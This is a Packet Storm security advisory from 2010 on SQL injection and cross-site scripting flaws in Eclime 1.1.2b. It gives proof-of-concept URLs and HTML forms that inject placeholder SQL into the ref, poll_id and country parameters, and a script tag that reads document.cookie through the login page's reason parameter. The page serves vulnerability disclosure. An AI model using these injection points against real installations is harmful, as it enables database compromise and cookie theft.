exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Eclime 1.1.2b SQL Injection / Cross Site Scripting

Eclime 1.1.2b SQL Injection / Cross Site Scripting
Posted Nov 30, 2010
Authored by High-Tech Bridge SA | Site htbridge.com

Eclime version 1.1.2b suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 403c68d4d046d41c31d0bc50bc56f98a51435fe4521d8b85c2c332b03ec0008c

Eclime 1.1.2b SQL Injection / Cross Site Scripting

Change Mirror Download
Vulnerability ID: HTB22705
Reference: http://www.htbridge.ch/advisory/sql_injection_in_eclime_1.html
Product: Eclime
Vendor: www.eclime.com ( http://www.eclime.com/ )
Vulnerable Version: 1.1.2b
Vendor Notification: 16 November 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in ref variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


http://[host]/?ref=123%27SQL_CODE_HERE

SQL Injection:
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in poll_id & poll_options_id variables.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


<form action="http://[host]/index.php?poll_action=vote" method="post">
<input name="poll_options_id" value="1" type="hidden">
<input name="poll_id" type="hidden" value="1'SQL_CODE_HERE" >
<input type="submit" value="submit" name="submit" />
</form>

SQL Injection:
Vulnerability Details:
The vulnerability exists due to failure in the "/create_account.php" script to properly sanitize user-supplied input in country variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


<form action="http://[host]/create_account.php" method="post" name="main" >
<input type="hidden" name="action" value="process" id="action" />
<input type="hidden" name="email_address" value="email@address.com" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="confirmation" value="password" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="firstname" value="firstname" />
<input type="hidden" name="lastname" value="lastname" />
<input type="hidden" name="dob_month" value="01" />
<input type="hidden" name="dob_day" value="01" />
<input type="hidden" name="dob_year" value="1987" />
<input type="hidden" name="street_address" value="street_address" />
<input type="hidden" name="city" value="city" />
<input type="hidden" name="state" value="state" />
<input type="hidden" name="postcode" value="1234" />
<input type="hidden" name="phoneAreaCode" value="123" />
<input type="hidden" name="phonePrefix" value="123" />
<input type="hidden" name="phoneNumber" value="123" />
<input type="hidden" name="country" value="'SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />
</form>

XSS:
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/login.php" script to properly sanitize user-supplied input in "reason" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

The following PoC is available:


http://[host]/login.php?login=fail&reason=<script>alert(document.cookie);</script>

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close